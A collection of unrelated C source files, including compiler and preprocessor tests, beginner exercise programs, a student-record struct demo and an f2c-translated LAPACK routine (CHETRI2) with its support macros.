return __builtin_isunordered(f1, f2);
// CHECK: ret
}
|
the_stack_data/64200221.c | #include <stdio.h>
int main(){
int num;
printf("Enter a Number to check \n");
scanf("%d",&num);
if(num>0)
{
printf("Number is a positive number.");
}
if(num==0)
{
printf("Number is neither negative nor positive.");
}
else
{
printf("Number is a negative number.");
}
return 0;
}
|
the_stack_data/132953342.c | #ifdef FOO1
KEEP ME
#endif
#if defined(FOO2) && defined(FOO2)
KEEP ME
#elif defined FOO3 || defined FOO4
KEEP ME
#elif FOO5
KEEP ME
#endif
|
the_stack_data/150141768.c | struct s {
int : 4;
int : 2;
};
int main(void) {
return 0;
}
|
the_stack_data/87637627.c | //Chelin Tutorials All Rights Reserved
//http://chelintutorials.blogspot.com/
#include<stdio.h>
int main(void){
int x=1,y=13,z;
if (x>y){
printf("x>y");
}
else if (x<y){
printf("x<y");
}
else if (x==y){
printf("x=y");
}
printf("\n estoi debajo de los if/elseif");
return 0;
}
|
the_stack_data/94988.c | #include <math.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <complex.h>
#ifdef complex
#undef complex
#endif
#ifdef I
#undef I
#endif
#if defined(_WIN64)
typedef long long BLASLONG;
typedef unsigned long long BLASULONG;
#else
typedef long BLASLONG;
typedef unsigned long BLASULONG;
#endif
#ifdef LAPACK_ILP64
typedef BLASLONG blasint;
#if defined(_WIN64)
#define blasabs(x) llabs(x)
#else
#define blasabs(x) labs(x)
#endif
#else
typedef int blasint;
#define blasabs(x) abs(x)
#endif
typedef blasint integer;
typedef unsigned int uinteger;
typedef char *address;
typedef short int shortint;
typedef float real;
typedef double doublereal;
typedef struct { real r, i; } complex;
typedef struct { doublereal r, i; } doublecomplex;
#ifdef _MSC_VER
static inline _Fcomplex Cf(complex *z) {_Fcomplex zz={z->r , z->i}; return zz;}
static inline _Dcomplex Cd(doublecomplex *z) {_Dcomplex zz={z->r , z->i};return zz;}
static inline _Fcomplex * _pCf(complex *z) {return (_Fcomplex*)z;}
static inline _Dcomplex * _pCd(doublecomplex *z) {return (_Dcomplex*)z;}
#else
static inline _Complex float Cf(complex *z) {return z->r + z->i*_Complex_I;}
static inline _Complex double Cd(doublecomplex *z) {return z->r + z->i*_Complex_I;}
static inline _Complex float * _pCf(complex *z) {return (_Complex float*)z;}
static inline _Complex double * _pCd(doublecomplex *z) {return (_Complex double*)z;}
#endif
#define pCf(z) (*_pCf(z))
#define pCd(z) (*_pCd(z))
typedef int logical;
typedef short int shortlogical;
typedef char logical1;
typedef char integer1;
#define TRUE_ (1)
#define FALSE_ (0)
/* Extern is for use with -E */
#ifndef Extern
#define Extern extern
#endif
/* I/O stuff */
typedef int flag;
typedef int ftnlen;
typedef int ftnint;
/*external read, write*/
typedef struct
{ flag cierr;
ftnint ciunit;
flag ciend;
char *cifmt;
ftnint cirec;
} cilist;
/*internal read, write*/
typedef struct
{ flag icierr;
char *iciunit;
flag iciend;
char *icifmt;
ftnint icirlen;
ftnint icirnum;
} icilist;
/*open*/
typedef struct
{ flag oerr;
ftnint ounit;
char *ofnm;
ftnlen ofnmlen;
char *osta;
char *oacc;
char *ofm;
ftnint orl;
char *oblnk;
} olist;
/*close*/
typedef struct
{ flag cerr;
ftnint cunit;
char *csta;
} cllist;
/*rewind, backspace, endfile*/
typedef struct
{ flag aerr;
ftnint aunit;
} alist;
/* inquire */
typedef struct
{ flag inerr;
ftnint inunit;
char *infile;
ftnlen infilen;
ftnint *inex; /*parameters in standard's order*/
ftnint *inopen;
ftnint *innum;
ftnint *innamed;
char *inname;
ftnlen innamlen;
char *inacc;
ftnlen inacclen;
char *inseq;
ftnlen inseqlen;
char *indir;
ftnlen indirlen;
char *infmt;
ftnlen infmtlen;
char *inform;
ftnint informlen;
char *inunf;
ftnlen inunflen;
ftnint *inrecl;
ftnint *innrec;
char *inblank;
ftnlen inblanklen;
} inlist;
#define VOID void
union Multitype { /* for multiple entry points */
integer1 g;
shortint h;
integer i;
/* longint j; */
real r;
doublereal d;
complex c;
doublecomplex z;
};
typedef union Multitype Multitype;
struct Vardesc { /* for Namelist */
char *name;
char *addr;
ftnlen *dims;
int type;
};
typedef struct Vardesc Vardesc;
struct Namelist {
char *name;
Vardesc **vars;
int nvars;
};
typedef struct Namelist Namelist;
#define abs(x) ((x) >= 0 ? (x) : -(x))
#define dabs(x) (fabs(x))
#define f2cmin(a,b) ((a) <= (b) ? (a) : (b))
#define f2cmax(a,b) ((a) >= (b) ? (a) : (b))
#define dmin(a,b) (f2cmin(a,b))
#define dmax(a,b) (f2cmax(a,b))
#define bit_test(a,b) ((a) >> (b) & 1)
#define bit_clear(a,b) ((a) & ~((uinteger)1 << (b)))
#define bit_set(a,b) ((a) | ((uinteger)1 << (b)))
#define abort_() { sig_die("Fortran abort routine called", 1); }
#define c_abs(z) (cabsf(Cf(z)))
#define c_cos(R,Z) { pCf(R)=ccos(Cf(Z)); }
#ifdef _MSC_VER
#define c_div(c, a, b) {Cf(c)._Val[0] = (Cf(a)._Val[0]/Cf(b)._Val[0]); Cf(c)._Val[1]=(Cf(a)._Val[1]/Cf(b)._Val[1]);}
#define z_div(c, a, b) {Cd(c)._Val[0] = (Cd(a)._Val[0]/Cd(b)._Val[0]); Cd(c)._Val[1]=(Cd(a)._Val[1]/df(b)._Val[1]);}
#else
#define c_div(c, a, b) {pCf(c) = Cf(a)/Cf(b);}
#define z_div(c, a, b) {pCd(c) = Cd(a)/Cd(b);}
#endif
#define c_exp(R, Z) {pCf(R) = cexpf(Cf(Z));}
#define c_log(R, Z) {pCf(R) = clogf(Cf(Z));}
#define c_sin(R, Z) {pCf(R) = csinf(Cf(Z));}
//#define c_sqrt(R, Z) {*(R) = csqrtf(Cf(Z));}
#define c_sqrt(R, Z) {pCf(R) = csqrtf(Cf(Z));}
#define d_abs(x) (fabs(*(x)))
#define d_acos(x) (acos(*(x)))
#define d_asin(x) (asin(*(x)))
#define d_atan(x) (atan(*(x)))
#define d_atn2(x, y) (atan2(*(x),*(y)))
#define d_cnjg(R, Z) { pCd(R) = conj(Cd(Z)); }
#define r_cnjg(R, Z) { pCf(R) = conjf(Cf(Z)); }
#define d_cos(x) (cos(*(x)))
#define d_cosh(x) (cosh(*(x)))
#define d_dim(__a, __b) ( *(__a) > *(__b) ? *(__a) - *(__b) : 0.0 )
#define d_exp(x) (exp(*(x)))
#define d_imag(z) (cimag(Cd(z)))
#define r_imag(z) (cimagf(Cf(z)))
#define d_int(__x) (*(__x)>0 ? floor(*(__x)) : -floor(- *(__x)))
#define r_int(__x) (*(__x)>0 ? floor(*(__x)) : -floor(- *(__x)))
#define d_lg10(x) ( 0.43429448190325182765 * log(*(x)) )
#define r_lg10(x) ( 0.43429448190325182765 * log(*(x)) )
#define d_log(x) (log(*(x)))
#define d_mod(x, y) (fmod(*(x), *(y)))
#define u_nint(__x) ((__x)>=0 ? floor((__x) + .5) : -floor(.5 - (__x)))
#define d_nint(x) u_nint(*(x))
#define u_sign(__a,__b) ((__b) >= 0 ? ((__a) >= 0 ? (__a) : -(__a)) : -((__a) >= 0 ? (__a) : -(__a)))
#define d_sign(a,b) u_sign(*(a),*(b))
#define r_sign(a,b) u_sign(*(a),*(b))
#define d_sin(x) (sin(*(x)))
#define d_sinh(x) (sinh(*(x)))
#define d_sqrt(x) (sqrt(*(x)))
#define d_tan(x) (tan(*(x)))
#define d_tanh(x) (tanh(*(x)))
#define i_abs(x) abs(*(x))
#define i_dnnt(x) ((integer)u_nint(*(x)))
#define i_len(s, n) (n)
#define i_nint(x) ((integer)u_nint(*(x)))
#define i_sign(a,b) ((integer)u_sign((integer)*(a),(integer)*(b)))
#define pow_dd(ap, bp) ( pow(*(ap), *(bp)))
#define pow_si(B,E) spow_ui(*(B),*(E))
#define pow_ri(B,E) spow_ui(*(B),*(E))
#define pow_di(B,E) dpow_ui(*(B),*(E))
#define pow_zi(p, a, b) {pCd(p) = zpow_ui(Cd(a), *(b));}
#define pow_ci(p, a, b) {pCf(p) = cpow_ui(Cf(a), *(b));}
#define pow_zz(R,A,B) {pCd(R) = cpow(Cd(A),*(B));}
#define s_cat(lpp, rpp, rnp, np, llp) { ftnlen i, nc, ll; char *f__rp, *lp; ll = (llp); lp = (lpp); for(i=0; i < (int)*(np); ++i) { nc = ll; if((rnp)[i] < nc) nc = (rnp)[i]; ll -= nc; f__rp = (rpp)[i]; while(--nc >= 0) *lp++ = *(f__rp)++; } while(--ll >= 0) *lp++ = ' '; }
#define s_cmp(a,b,c,d) ((integer)strncmp((a),(b),f2cmin((c),(d))))
#define s_copy(A,B,C,D) { int __i,__m; for (__i=0, __m=f2cmin((C),(D)); __i<__m && (B)[__i] != 0; ++__i) (A)[__i] = (B)[__i]; }
#define sig_die(s, kill) { exit(1); }
#define s_stop(s, n) {exit(0);}
static char junk[] = "\n@(#)LIBF77 VERSION 19990503\n";
#define z_abs(z) (cabs(Cd(z)))
#define z_exp(R, Z) {pCd(R) = cexp(Cd(Z));}
#define z_sqrt(R, Z) {pCd(R) = csqrt(Cd(Z));}
#define myexit_() break;
#define mycycle() continue;
#define myceiling(w) {ceil(w)}
#define myhuge(w) {HUGE_VAL}
//#define mymaxloc_(w,s,e,n) {if (sizeof(*(w)) == sizeof(double)) dmaxloc_((w),*(s),*(e),n); else dmaxloc_((w),*(s),*(e),n);}
#define mymaxloc(w,s,e,n) {dmaxloc_(w,*(s),*(e),n)}
/* procedure parameter types for -A and -C++ */
#define F2C_proc_par_types 1
#ifdef __cplusplus
typedef logical (*L_fp)(...);
#else
typedef logical (*L_fp)();
#endif
static float spow_ui(float x, integer n) {
float pow=1.0; unsigned long int u;
if(n != 0) {
if(n < 0) n = -n, x = 1/x;
for(u = n; ; ) {
if(u & 01) pow *= x;
if(u >>= 1) x *= x;
else break;
}
}
return pow;
}
static double dpow_ui(double x, integer n) {
double pow=1.0; unsigned long int u;
if(n != 0) {
if(n < 0) n = -n, x = 1/x;
for(u = n; ; ) {
if(u & 01) pow *= x;
if(u >>= 1) x *= x;
else break;
}
}
return pow;
}
#ifdef _MSC_VER
static _Fcomplex cpow_ui(complex x, integer n) {
complex pow={1.0,0.0}; unsigned long int u;
if(n != 0) {
if(n < 0) n = -n, x.r = 1/x.r, x.i=1/x.i;
for(u = n; ; ) {
if(u & 01) pow.r *= x.r, pow.i *= x.i;
if(u >>= 1) x.r *= x.r, x.i *= x.i;
else break;
}
}
_Fcomplex p={pow.r, pow.i};
return p;
}
#else
static _Complex float cpow_ui(_Complex float x, integer n) {
_Complex float pow=1.0; unsigned long int u;
if(n != 0) {
if(n < 0) n = -n, x = 1/x;
for(u = n; ; ) {
if(u & 01) pow *= x;
if(u >>= 1) x *= x;
else break;
}
}
return pow;
}
#endif
#ifdef _MSC_VER
static _Dcomplex zpow_ui(_Dcomplex x, integer n) {
_Dcomplex pow={1.0,0.0}; unsigned long int u;
if(n != 0) {
if(n < 0) n = -n, x._Val[0] = 1/x._Val[0], x._Val[1] =1/x._Val[1];
for(u = n; ; ) {
if(u & 01) pow._Val[0] *= x._Val[0], pow._Val[1] *= x._Val[1];
if(u >>= 1) x._Val[0] *= x._Val[0], x._Val[1] *= x._Val[1];
else break;
}
}
_Dcomplex p = {pow._Val[0], pow._Val[1]};
return p;
}
#else
static _Complex double zpow_ui(_Complex double x, integer n) {
_Complex double pow=1.0; unsigned long int u;
if(n != 0) {
if(n < 0) n = -n, x = 1/x;
for(u = n; ; ) {
if(u & 01) pow *= x;
if(u >>= 1) x *= x;
else break;
}
}
return pow;
}
#endif
static integer pow_ii(integer x, integer n) {
integer pow; unsigned long int u;
if (n <= 0) {
if (n == 0 || x == 1) pow = 1;
else if (x != -1) pow = x == 0 ? 1/x : 0;
else n = -n;
}
if ((n > 0) || !(n == 0 || x == 1 || x != -1)) {
u = n;
for(pow = 1; ; ) {
if(u & 01) pow *= x;
if(u >>= 1) x *= x;
else break;
}
}
return pow;
}
static integer dmaxloc_(double *w, integer s, integer e, integer *n)
{
double m; integer i, mi;
for(m=w[s-1], mi=s, i=s+1; i<=e; i++)
if (w[i-1]>m) mi=i ,m=w[i-1];
return mi-s+1;
}
static integer smaxloc_(float *w, integer s, integer e, integer *n)
{
float m; integer i, mi;
for(m=w[s-1], mi=s, i=s+1; i<=e; i++)
if (w[i-1]>m) mi=i ,m=w[i-1];
return mi-s+1;
}
static inline void cdotc_(complex *z, integer *n_, complex *x, integer *incx_, complex *y, integer *incy_) {
integer n = *n_, incx = *incx_, incy = *incy_, i;
#ifdef _MSC_VER
_Fcomplex zdotc = {0.0, 0.0};
if (incx == 1 && incy == 1) {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc._Val[0] += conjf(Cf(&x[i]))._Val[0] * Cf(&y[i])._Val[0];
zdotc._Val[1] += conjf(Cf(&x[i]))._Val[1] * Cf(&y[i])._Val[1];
}
} else {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc._Val[0] += conjf(Cf(&x[i*incx]))._Val[0] * Cf(&y[i*incy])._Val[0];
zdotc._Val[1] += conjf(Cf(&x[i*incx]))._Val[1] * Cf(&y[i*incy])._Val[1];
}
}
pCf(z) = zdotc;
}
#else
_Complex float zdotc = 0.0;
if (incx == 1 && incy == 1) {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc += conjf(Cf(&x[i])) * Cf(&y[i]);
}
} else {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc += conjf(Cf(&x[i*incx])) * Cf(&y[i*incy]);
}
}
pCf(z) = zdotc;
}
#endif
static inline void zdotc_(doublecomplex *z, integer *n_, doublecomplex *x, integer *incx_, doublecomplex *y, integer *incy_) {
integer n = *n_, incx = *incx_, incy = *incy_, i;
#ifdef _MSC_VER
_Dcomplex zdotc = {0.0, 0.0};
if (incx == 1 && incy == 1) {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc._Val[0] += conj(Cd(&x[i]))._Val[0] * Cd(&y[i])._Val[0];
zdotc._Val[1] += conj(Cd(&x[i]))._Val[1] * Cd(&y[i])._Val[1];
}
} else {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc._Val[0] += conj(Cd(&x[i*incx]))._Val[0] * Cd(&y[i*incy])._Val[0];
zdotc._Val[1] += conj(Cd(&x[i*incx]))._Val[1] * Cd(&y[i*incy])._Val[1];
}
}
pCd(z) = zdotc;
}
#else
_Complex double zdotc = 0.0;
if (incx == 1 && incy == 1) {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc += conj(Cd(&x[i])) * Cd(&y[i]);
}
} else {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc += conj(Cd(&x[i*incx])) * Cd(&y[i*incy]);
}
}
pCd(z) = zdotc;
}
#endif
static inline void cdotu_(complex *z, integer *n_, complex *x, integer *incx_, complex *y, integer *incy_) {
integer n = *n_, incx = *incx_, incy = *incy_, i;
#ifdef _MSC_VER
_Fcomplex zdotc = {0.0, 0.0};
if (incx == 1 && incy == 1) {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc._Val[0] += Cf(&x[i])._Val[0] * Cf(&y[i])._Val[0];
zdotc._Val[1] += Cf(&x[i])._Val[1] * Cf(&y[i])._Val[1];
}
} else {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc._Val[0] += Cf(&x[i*incx])._Val[0] * Cf(&y[i*incy])._Val[0];
zdotc._Val[1] += Cf(&x[i*incx])._Val[1] * Cf(&y[i*incy])._Val[1];
}
}
pCf(z) = zdotc;
}
#else
_Complex float zdotc = 0.0;
if (incx == 1 && incy == 1) {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc += Cf(&x[i]) * Cf(&y[i]);
}
} else {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc += Cf(&x[i*incx]) * Cf(&y[i*incy]);
}
}
pCf(z) = zdotc;
}
#endif
static inline void zdotu_(doublecomplex *z, integer *n_, doublecomplex *x, integer *incx_, doublecomplex *y, integer *incy_) {
integer n = *n_, incx = *incx_, incy = *incy_, i;
#ifdef _MSC_VER
_Dcomplex zdotc = {0.0, 0.0};
if (incx == 1 && incy == 1) {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc._Val[0] += Cd(&x[i])._Val[0] * Cd(&y[i])._Val[0];
zdotc._Val[1] += Cd(&x[i])._Val[1] * Cd(&y[i])._Val[1];
}
} else {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc._Val[0] += Cd(&x[i*incx])._Val[0] * Cd(&y[i*incy])._Val[0];
zdotc._Val[1] += Cd(&x[i*incx])._Val[1] * Cd(&y[i*incy])._Val[1];
}
}
pCd(z) = zdotc;
}
#else
_Complex double zdotc = 0.0;
if (incx == 1 && incy == 1) {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc += Cd(&x[i]) * Cd(&y[i]);
}
} else {
for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */
zdotc += Cd(&x[i*incx]) * Cd(&y[i*incy]);
}
}
pCd(z) = zdotc;
}
#endif
/* -- translated by f2c (version 20000121).
You must link the resulting object file with the libraries:
-lf2c -lm (in that order)
*/
/* Table of constant values */
static integer c__1 = 1;
static integer c_n1 = -1;
/* > \brief \b CHETRI2 */
/* =========== DOCUMENTATION =========== */
/* Online html documentation available at */
/* http://www.netlib.org/lapack/explore-html/ */
/* > \htmlonly */
/* > Download CHETRI2 + dependencies */
/* > <a href="http://www.netlib.org/cgi-bin/netlibfiles.tgz?format=tgz&filename=/lapack/lapack_routine/chetri2
.f"> */
/* > [TGZ]</a> */
/* > <a href="http://www.netlib.org/cgi-bin/netlibfiles.zip?format=zip&filename=/lapack/lapack_routine/chetri2
.f"> */
/* > [ZIP]</a> */
/* > <a href="http://www.netlib.org/cgi-bin/netlibfiles.txt?format=txt&filename=/lapack/lapack_routine/chetri2
.f"> */
/* > [TXT]</a> */
/* > \endhtmlonly */
/* Definition: */
/* =========== */
/* SUBROUTINE CHETRI2( UPLO, N, A, LDA, IPIV, WORK, LWORK, INFO ) */
/* CHARACTER UPLO */
/* INTEGER INFO, LDA, LWORK, N */
/* INTEGER IPIV( * ) */
/* COMPLEX A( LDA, * ), WORK( * ) */
/* > \par Purpose: */
/* ============= */
/* > */
/* > \verbatim */
/* > */
/* > CHETRI2 computes the inverse of a COMPLEX hermitian indefinite matrix */
/* > A using the factorization A = U*D*U**T or A = L*D*L**T computed by */
/* > CHETRF. CHETRI2 set the LEADING DIMENSION of the workspace */
/* > before calling CHETRI2X that actually computes the inverse. */
/* > \endverbatim */
/* Arguments: */
/* ========== */
/* > \param[in] UPLO */
/* > \verbatim */
/* > UPLO is CHARACTER*1 */
/* > Specifies whether the details of the factorization are stored */
/* > as an upper or lower triangular matrix. */
/* > = 'U': Upper triangular, form is A = U*D*U**T; */
/* > = 'L': Lower triangular, form is A = L*D*L**T. */
/* > \endverbatim */
/* > */
/* > \param[in] N */
/* > \verbatim */
/* > N is INTEGER */
/* > The order of the matrix A. N >= 0. */
/* > \endverbatim */
/* > */
/* > \param[in,out] A */
/* > \verbatim */
/* > A is COMPLEX array, dimension (LDA,N) */
/* > On entry, the block diagonal matrix D and the multipliers */
/* > used to obtain the factor U or L as computed by CHETRF. */
/* > */
/* > On exit, if INFO = 0, the (symmetric) inverse of the original */
/* > matrix. If UPLO = 'U', the upper triangular part of the */
/* > inverse is formed and the part of A below the diagonal is not */
/* > referenced; if UPLO = 'L' the lower triangular part of the */
/* > inverse is formed and the part of A above the diagonal is */
/* > not referenced. */
/* > \endverbatim */
/* > */
/* > \param[in] LDA */
/* > \verbatim */
/* > LDA is INTEGER */
/* > The leading dimension of the array A. LDA >= f2cmax(1,N). */
/* > \endverbatim */
/* > */
/* > \param[in] IPIV */
/* > \verbatim */
/* > IPIV is INTEGER array, dimension (N) */
/* > Details of the interchanges and the block structure of D */
/* > as determined by CHETRF. */
/* > \endverbatim */
/* > */
/* > \param[out] WORK */
/* > \verbatim */
/* > WORK is COMPLEX array, dimension (N+NB+1)*(NB+3) */
/* > \endverbatim */
/* > */
/* > \param[in] LWORK */
/* > \verbatim */
/* > LWORK is INTEGER */
/* > The dimension of the array WORK. */
/* > WORK is size >= (N+NB+1)*(NB+3) */
/* > If LWORK = -1, then a workspace query is assumed; the routine */
/* > calculates: */
/* > - the optimal size of the WORK array, returns */
/* > this value as the first entry of the WORK array, */
/* > - and no error message related to LWORK is issued by XERBLA. */
/* > \endverbatim */
/* > */
/* > \param[out] INFO */
/* > \verbatim */
/* > INFO is INTEGER */
/* > = 0: successful exit */
/* > < 0: if INFO = -i, the i-th argument had an illegal value */
/* > > 0: if INFO = i, D(i,i) = 0; the matrix is singular and its */
/* > inverse could not be computed. */
/* > \endverbatim */
/* Authors: */
/* ======== */
/* > \author Univ. of Tennessee */
/* > \author Univ. of California Berkeley */
/* > \author Univ. of Colorado Denver */
/* > \author NAG Ltd. */
/* > \date November 2017 */
/* > \ingroup complexHEcomputational */
/* ===================================================================== */
/* Subroutine */ int chetri2_(char *uplo, integer *n, complex *a, integer *
lda, integer *ipiv, complex *work, integer *lwork, integer *info)
{
/* System generated locals */
integer a_dim1, a_offset, i__1;
/* Local variables */
extern /* Subroutine */ int chetri2x_(char *, integer *, complex *,
integer *, integer *, complex *, integer *, integer *);
extern logical lsame_(char *, char *);
integer nbmax;
logical upper;
extern /* Subroutine */ int xerbla_(char *, integer *, ftnlen);
extern integer ilaenv_(integer *, char *, char *, integer *, integer *,
integer *, integer *, ftnlen, ftnlen);
extern /* Subroutine */ int chetri_(char *, integer *, complex *, integer
*, integer *, complex *, integer *);
logical lquery;
integer minsize;
/* -- LAPACK computational routine (version 3.8.0) -- */
/* -- LAPACK is a software package provided by Univ. of Tennessee, -- */
/* -- Univ. of California Berkeley, Univ. of Colorado Denver and NAG Ltd..-- */
/* November 2017 */
/* ===================================================================== */
/* Test the input parameters. */
/* Parameter adjustments */
a_dim1 = *lda;
a_offset = 1 + a_dim1 * 1;
a -= a_offset;
--ipiv;
--work;
/* Function Body */
*info = 0;
upper = lsame_(uplo, "U");
lquery = *lwork == -1;
/* Get blocksize */
nbmax = ilaenv_(&c__1, "CHETRF", uplo, n, &c_n1, &c_n1, &c_n1, (ftnlen)6,
(ftnlen)1);
if (nbmax >= *n) {
minsize = *n;
} else {
minsize = (*n + nbmax + 1) * (nbmax + 3);
}
if (! upper && ! lsame_(uplo, "L")) {
*info = -1;
} else if (*n < 0) {
*info = -2;
} else if (*lda < f2cmax(1,*n)) {
*info = -4;
} else if (*lwork < minsize && ! lquery) {
*info = -7;
}
/* Quick return if possible */
if (*info != 0) {
i__1 = -(*info);
xerbla_("CHETRI2", &i__1, (ftnlen)7);
return 0;
} else if (lquery) {
work[1].r = (real) minsize, work[1].i = 0.f;
return 0;
}
if (*n == 0) {
return 0;
}
if (nbmax >= *n) {
chetri_(uplo, n, &a[a_offset], lda, &ipiv[1], &work[1], info);
} else {
chetri2x_(uplo, n, &a[a_offset], lda, &ipiv[1], &work[1], &nbmax,
info);
}
return 0;
/* End of CHETRI2 */
} /* chetri2_ */
|
the_stack_data/6388457.c | #include <stdio.h>
void Run();
int main() { Run(); return 0; }
void Run()
{
int _u_lx = 400;
int _u_ly = 100;
double _tmpxx0 = ((double)_u_lx / 5);
double _u_obst_x = (_tmpxx0+1);
double _u_x[400][100];
{
int lv1, lv2;
for(lv1 = 0; lv1 <= 399; lv1 += 1)
for(lv2 = 0; lv2 <= 99; lv2 += 1)
_u_x[lv1][lv2] = 0.0;
}
double _tmpxx8[400][100];
{
int lv1, lv2;
(int) (_u_lx*_u_ly)==40000?(void) 0:__assert_fail("(int) (_u_lx*_u_ly)==40000", "./simplify_conditionnal03.c", 22, (const char *) 0);
for(lv1 = 0; lv1 <= 399; lv1 += 1)
for(lv2 = 0; lv2 <= 99; lv2 += 1)
_tmpxx8[lv1][lv2] = _u_x[lv1][lv2]-_u_obst_x;
}
{
int lv1, lv2;
for(lv1 = 0; lv1 <= 399; lv1 += 1)
for(lv2 = 0; lv2 <= 99; lv2 += 1)
printf("%f", _tmpxx8[lv1][lv2]);
}
}
|
the_stack_data/52800.c | /* Program to demonstrate passing structure values to a function.
Program reads and displays data for a student. */
#include <stdio.h>
struct student_rec /* Global structure template. */
{
int number ;
char surname[21] ;
char first_name[11] ;
int scores[5] ;
} ;
main()
{
void display_student_data( struct student_rec student );
void get_student_data( struct student_rec *ptr ) ;
struct student_rec student ;
struct student_rec *student_ptr ;
student_ptr = &student ;
/* Use a pointer to a structure variable as an argument. */
get_student_data( student_ptr ) ;
/* Use a structure variable as an argument. */
display_student_data( student ) ;
}
/* Function : display_student_data()
Purpose : This function displays student data.
Arguments: The student data. */
void display_student_data ( struct student_rec student)
{
int i;
printf( "\nThe data in the student structure is:" ) ;
printf( "\nNumber is %d", student.number ) ;
printf( "\nSurname is %s", student.surname ) ;
printf( "\nFirst name is %s", student.first_name ) ;
printf( "\nScores are: " ) ;
for ( i= 0 ; i < 5 ; i++ )
printf( " %d ", student.scores[i] ) ;
printf( "\n" ) ;
}
/* Function : get_student()
Purpose : This function reads student data.
Arguments: A pointer to the student data structure. */
void get_student_data( struct student_rec *ptr )
{
int i ;
printf( "Number: " ) ;
scanf( "%d", &(ptr->number) ) ;
printf( "Surname: " ) ;
scanf( "%20s", ptr->surname ) ;
printf( "First name: " ) ;
scanf( "%10s", ptr->first_name ) ;
printf( "Five test scores: " ) ;
for ( i= 0 ; i < 5 ; i++ )
scanf( "%d", &(ptr->scores[i]) ) ;
}
|
the_stack_data/23576648.c | /* { dg-do compile } */
/* { dg-options "-O1 -ftree-vrp -fdump-tree-vrp1" } */
/* LLVM LOCAL test not applicable */
/* { dg-require-fdump "" } */
/* { dg-require-effective-target int32plus } */
extern void link_error ();
void test01(unsigned int a, unsigned int b)
{
unsigned int x = 0x80000000;
if (a < x)
if (b < x)
if (a > 5)
if (a + b == 0U)
link_error ();
}
void test02(unsigned int a, unsigned int b)
{
unsigned int x = 0x80000000;
if (a > x)
if (b < x)
if (a - b == 1U)
link_error ();
}
/* { dg-final { scan-tree-dump-times "link_error" 0 "vrp1" } } */
/* { dg-final { cleanup-tree-dump "vrp1" } } */
|
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